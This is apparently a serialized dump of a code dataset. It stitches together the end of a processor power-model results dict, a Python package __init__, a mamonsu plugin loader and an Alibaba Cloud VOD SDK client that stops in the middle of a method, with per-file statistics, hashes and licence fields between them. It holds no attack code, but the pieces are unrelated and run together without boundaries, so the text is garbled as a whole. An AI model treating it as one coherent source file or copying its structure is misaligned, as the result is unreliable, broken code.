'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00203189,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.0018282,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000739682,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000629541,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00652152,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0173941,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0421295,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.67979,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.15867,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.143091,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.02837,
'Instruction Fetch Unit/Runtime Dynamic': 0.367806,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0328972,
'L2/Runtime Dynamic': 0.00768972,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.51334,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.62472,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0412887,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0412888,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.70831,
'Load Store Unit/Runtime Dynamic': 0.869631,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.101811,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.203622,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.036133,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0364951,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.16662,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0264029,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.384799,
'Memory Management Unit/Runtime Dynamic': 0.062898,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 15.8829,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 4.64781e-06,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00637402,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0716774,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.078056,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.7601,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 6.1691568649082935,
'Runtime Dynamic': 6.1691568649082935,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.302989,
'Runtime Dynamic': 0.0592488,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 80.0957,
'Peak Power': 113.208,
'Runtime Dynamic': 18.2866,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 79.7927,
'Total Cores/Runtime Dynamic': 18.2273,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.302989,
'Total L3s/Runtime Dynamic': 0.0592488,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.085339
| 124
| 0.682054
| 8,090
| 68,628
| 5.779975
| 0.067738
| 0.123524
| 0.112917
| 0.093413
| 0.939435
| 0.930368
| 0.917536
| 0.886762
| 0.862532
| 0.842237
| 0
| 0.131957
| 0.224267
| 68,628
| 914
| 125
| 75.085339
| 0.746379
| 0
| 0
| 0.642232
| 0
| 0
| 0.657229
| 0.048085
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ab7c83606b72dc22dd2cc94110e980988deb2d5a
| 145
|
py
|
Python
|
loldib/getratings/models/NA/na_brand/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_brand/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_brand/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from .na_brand_top import *
from .na_brand_jng import *
from .na_brand_mid import *
from .na_brand_bot import *
from .na_brand_sup import *
| 24.166667
| 28
| 0.758621
| 25
| 145
| 4
| 0.36
| 0.3
| 0.55
| 0.68
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.172414
| 145
| 5
| 29
| 29
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ab8babb032e52016e59e64012fb813ea0a78ae77
| 178
|
py
|
Python
|
mamonsu/plugins/system/__init__.py
|
dan-aksenov/mamonsu
|
c4822b48974e870af91910515fd7f11e4b8b41b3
|
[
"BSD-3-Clause"
] | 188
|
2016-01-31T09:05:59.000Z
|
2022-03-22T16:49:12.000Z
|
mamonsu/plugins/system/__init__.py
|
dan-aksenov/mamonsu
|
c4822b48974e870af91910515fd7f11e4b8b41b3
|
[
"BSD-3-Clause"
] | 162
|
2016-02-02T13:49:14.000Z
|
2022-02-22T08:45:42.000Z
|
mamonsu/plugins/system/__init__.py
|
dan-aksenov/mamonsu
|
c4822b48974e870af91910515fd7f11e4b8b41b3
|
[
"BSD-3-Clause"
] | 46
|
2016-01-31T21:23:37.000Z
|
2022-02-07T10:59:54.000Z
|
import mamonsu.lib.platform as platform
if platform.LINUX:
    # Importing the submodule is done purely for its side effect (the import
    # registers the Linux-specific system plugins); the returned module object
    # is deliberately discarded, hence __import__ instead of a bound import.
    __import__('mamonsu.plugins.system.linux')
if platform.WINDOWS:
    # Same pattern for Windows: import only to trigger plugin registration.
    __import__('mamonsu.plugins.system.windows')
| 22.25
| 48
| 0.775281
| 22
| 178
| 5.909091
| 0.454545
| 0.3
| 0.307692
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.11236
| 178
| 7
| 49
| 25.428571
| 0.822785
| 0
| 0
| 0
| 0
| 0
| 0.325843
| 0.325843
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e60180cc48eae83c4059ded842771b9e9efe2aa2
| 85,338
|
py
|
Python
|
alibabacloud/clients/vod_20170321.py
|
wallisyan/alibabacloud-python-sdk-v2
|
6e024c97cded2403025a7dd8fea8261e41872156
|
[
"Apache-2.0"
] | 21
|
2018-12-20T07:34:13.000Z
|
2020-03-05T14:32:08.000Z
|
alibabacloud/clients/vod_20170321.py
|
wallisyan/alibabacloud-python-sdk-v2
|
6e024c97cded2403025a7dd8fea8261e41872156
|
[
"Apache-2.0"
] | 22
|
2018-12-21T13:22:33.000Z
|
2020-06-29T08:37:09.000Z
|
alibabacloud/clients/vod_20170321.py
|
wallisyan/alibabacloud-python-sdk-v2
|
6e024c97cded2403025a7dd8fea8261e41872156
|
[
"Apache-2.0"
] | 12
|
2018-12-29T05:45:55.000Z
|
2022-01-05T09:59:30.000Z
|
# Copyright 2019 Alibaba Cloud Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from alibabacloud.client import AlibabaCloudClient
from alibabacloud.request import APIRequest
from alibabacloud.utils.parameter_validation import verify_params
class VodClient(AlibabaCloudClient):
def __init__(self, client_config, credentials_provider=None, retry_policy=None,
endpoint_resolver=None):
AlibabaCloudClient.__init__(self, client_config,
credentials_provider=credentials_provider,
retry_policy=retry_policy,
endpoint_resolver=endpoint_resolver)
self.product_code = 'vod'
self.api_version = '2017-03-21'
self.location_service_code = 'vod'
self.location_endpoint_type = 'openAPI'
def modify_vod_domain_schdm_by_property(self, property_=None, domain_name=None, owner_id=None):
api_request = APIRequest('ModifyVodDomainSchdmByProperty', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"Property": property_,
"DomainName": domain_name,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def get_ai_video_tag_result(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
owner_id=None,
media_id=None):
api_request = APIRequest('GetAIVideoTagResult', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"OwnerId": owner_id,
"MediaId": media_id}
return self._handle_request(api_request).result
def get_upload_details(
self,
resource_owner_id=None,
resource_owner_account=None,
resource_real_owner_id=None,
media_ids=None,
owner_id=None,
media_type=None):
api_request = APIRequest('GetUploadDetails', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"ResourceRealOwnerId": resource_real_owner_id,
"MediaIds": media_ids,
"OwnerId": owner_id,
"MediaType": media_type}
return self._handle_request(api_request).result
def describe_vod_storage_data(
self,
start_time=None,
storage=None,
storage_type=None,
end_time=None,
owner_id=None,
region=None):
api_request = APIRequest('DescribeVodStorageData', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"StartTime": start_time,
"Storage": storage,
"StorageType": storage_type,
"EndTime": end_time,
"OwnerId": owner_id,
"Region": region}
return self._handle_request(api_request).result
def describe_vod_ai_data(
self,
start_time=None,
ai_type=None,
end_time=None,
owner_id=None,
region=None):
api_request = APIRequest('DescribeVodAIData', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"StartTime": start_time,
"AIType": ai_type,
"EndTime": end_time,
"OwnerId": owner_id,
"Region": region}
return self._handle_request(api_request).result
def describe_vod_transcode_data(
self,
start_time=None,
storage=None,
end_time=None,
specification=None,
owner_id=None,
region=None):
api_request = APIRequest('DescribeVodTranscodeData', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"StartTime": start_time,
"Storage": storage,
"EndTime": end_time,
"Specification": specification,
"OwnerId": owner_id,
"Region": region}
return self._handle_request(api_request).result
def delete_multipart_upload(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
resource_real_owner_id=None,
owner_id=None,
media_id=None,
media_type=None):
api_request = APIRequest('DeleteMultipartUpload', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id,
"MediaId": media_id,
"MediaType": media_type}
return self._handle_request(api_request).result
def get_attached_media_info(
self,
resource_owner_id=None,
resource_owner_account=None,
output_type=None,
media_ids=None,
resource_real_owner_id=None,
owner_id=None,
auth_timeout=None):
api_request = APIRequest('GetAttachedMediaInfo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OutputType": output_type,
"MediaIds": media_ids,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id,
"AuthTimeout": auth_timeout}
return self._handle_request(api_request).result
def delete_attached_media(
self,
resource_owner_id=None,
resource_owner_account=None,
media_ids=None,
owner_id=None):
api_request = APIRequest('DeleteAttachedMedia', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"MediaIds": media_ids,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def update_attached_media_infos(
self,
resource_owner_id=None,
update_content=None,
resource_owner_account=None,
resource_real_owner_id=None,
owner_id=None):
api_request = APIRequest('UpdateAttachedMediaInfos', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"UpdateContent": update_content,
"ResourceOwnerAccount": resource_owner_account,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def attach_app_policy_to_identity(
self,
identity_name=None,
resource_owner_id=None,
identity_type=None,
resource_owner_account=None,
app_id=None,
policy_names=None,
resource_real_owner_id=None,
owner_id=None):
api_request = APIRequest('AttachAppPolicyToIdentity', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"IdentityName": identity_name,
"ResourceOwnerId": resource_owner_id,
"IdentityType": identity_type,
"ResourceOwnerAccount": resource_owner_account,
"AppId": app_id,
"PolicyNames": policy_names,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def detach_app_policy_from_identity(
self,
identity_name=None,
resource_owner_id=None,
identity_type=None,
resource_owner_account=None,
app_id=None,
policy_names=None,
owner_id=None):
api_request = APIRequest('DetachAppPolicyFromIdentity', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"IdentityName": identity_name,
"ResourceOwnerId": resource_owner_id,
"IdentityType": identity_type,
"ResourceOwnerAccount": resource_owner_account,
"AppId": app_id,
"PolicyNames": policy_names,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def list_app_policies_for_identity(
self,
identity_name=None,
resource_owner_id=None,
identity_type=None,
resource_owner_account=None,
app_id=None,
owner_id=None):
api_request = APIRequest('ListAppPoliciesForIdentity', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"IdentityName": identity_name,
"ResourceOwnerId": resource_owner_id,
"IdentityType": identity_type,
"ResourceOwnerAccount": resource_owner_account,
"AppId": app_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def create_app_info(
self,
resource_owner_id=None,
app_name=None,
resource_owner_account=None,
description=None,
resource_real_owner_id=None,
owner_id=None):
api_request = APIRequest('CreateAppInfo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"AppName": app_name,
"ResourceOwnerAccount": resource_owner_account,
"Description": description,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def get_app_infos(
self,
resource_owner_id=None,
app_ids=None,
resource_owner_account=None,
resource_real_owner_id=None,
owner_id=None):
api_request = APIRequest('GetAppInfos', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"AppIds": app_ids,
"ResourceOwnerAccount": resource_owner_account,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def update_app_info(
self,
resource_owner_id=None,
app_name=None,
resource_owner_account=None,
app_id=None,
description=None,
resource_real_owner_id=None,
owner_id=None,
status=None):
api_request = APIRequest('UpdateAppInfo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"AppName": app_name,
"ResourceOwnerAccount": resource_owner_account,
"AppId": app_id,
"Description": description,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id,
"Status": status}
return self._handle_request(api_request).result
def delete_app_info(
self,
resource_owner_id=None,
resource_owner_account=None,
app_id=None,
resource_real_owner_id=None,
owner_id=None):
api_request = APIRequest('DeleteAppInfo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"AppId": app_id,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def list_app_info(
self,
resource_owner_id=None,
resource_owner_account=None,
page_no=None,
page_size=None,
resource_real_owner_id=None,
owner_id=None,
status=None):
api_request = APIRequest('ListAppInfo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"PageNo": page_no,
"PageSize": page_size,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id,
"Status": status}
return self._handle_request(api_request).result
def move_app_resource(
self,
target_app_id=None,
resource_owner_id=None,
resource_owner_account=None,
resource_real_owner_id=None,
owner_id=None,
resource_type=None,
resource_ids=None):
api_request = APIRequest('MoveAppResource', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"TargetAppId": target_app_id,
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id,
"ResourceType": resource_type,
"ResourceIds": resource_ids}
return self._handle_request(api_request).result
def delete_message_callback(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
app_id=None,
resource_real_owner_id=None,
owner_id=None):
api_request = APIRequest('DeleteMessageCallback', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"AppId": app_id,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def get_transcode_summary(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None,
video_ids=None):
api_request = APIRequest('GetTranscodeSummary', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id,
"VideoIds": video_ids}
return self._handle_request(api_request).result
def list_transcode_task(
self,
resource_owner_id=None,
resource_owner_account=None,
page_no=None,
page_size=None,
end_time=None,
video_id=None,
start_time=None,
owner_id=None):
api_request = APIRequest('ListTranscodeTask', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"PageNo": page_no,
"PageSize": page_size,
"EndTime": end_time,
"VideoId": video_id,
"StartTime": start_time,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def get_transcode_task(
self,
resource_owner_id=None,
resource_owner_account=None,
transcode_task_id=None,
owner_id=None):
api_request = APIRequest('GetTranscodeTask', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"TranscodeTaskId": transcode_task_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def get_url_upload_infos(
self,
resource_owner_id=None,
resource_owner_account=None,
job_ids=None,
upload_ur_ls=None,
owner_id=None):
api_request = APIRequest('GetURLUploadInfos', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"JobIds": job_ids,
"UploadURLs": upload_ur_ls,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def update_transcode_template_group(
self,
transcode_template_list=None,
resource_owner_id=None,
resource_owner_account=None,
name=None,
owner_id=None,
locked=None,
transcode_template_group_id=None):
api_request = APIRequest('UpdateTranscodeTemplateGroup', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"TranscodeTemplateList": transcode_template_list,
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"Name": name,
"OwnerId": owner_id,
"Locked": locked,
"TranscodeTemplateGroupId": transcode_template_group_id}
return self._handle_request(api_request).result
def add_transcode_template_group(
self,
transcode_template_list=None,
resource_owner_id=None,
resource_owner_account=None,
app_id=None,
name=None,
owner_id=None,
transcode_template_group_id=None):
api_request = APIRequest('AddTranscodeTemplateGroup', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"TranscodeTemplateList": transcode_template_list,
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"AppId": app_id,
"Name": name,
"OwnerId": owner_id,
"TranscodeTemplateGroupId": transcode_template_group_id}
return self._handle_request(api_request).result
def delete_transcode_template_group(
self,
resource_owner_id=None,
resource_owner_account=None,
transcode_template_ids=None,
owner_id=None,
transcode_template_group_id=None,
force_del_group=None):
api_request = APIRequest('DeleteTranscodeTemplateGroup', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"TranscodeTemplateIds": transcode_template_ids,
"OwnerId": owner_id,
"TranscodeTemplateGroupId": transcode_template_group_id,
"ForceDelGroup": force_del_group}
return self._handle_request(api_request).result
def get_transcode_template_group(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None,
transcode_template_group_id=None):
api_request = APIRequest('GetTranscodeTemplateGroup', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id,
"TranscodeTemplateGroupId": transcode_template_group_id}
return self._handle_request(api_request).result
def set_default_transcode_template_group(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None,
transcode_template_group_id=None):
api_request = APIRequest('SetDefaultTranscodeTemplateGroup', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id,
"TranscodeTemplateGroupId": transcode_template_group_id}
return self._handle_request(api_request).result
def list_transcode_template_group(
self,
resource_owner_id=None,
resource_owner_account=None,
page_no=None,
app_id=None,
page_size=None,
owner_id=None):
api_request = APIRequest('ListTranscodeTemplateGroup', 'GET', 'http', 'RPC', 'query')
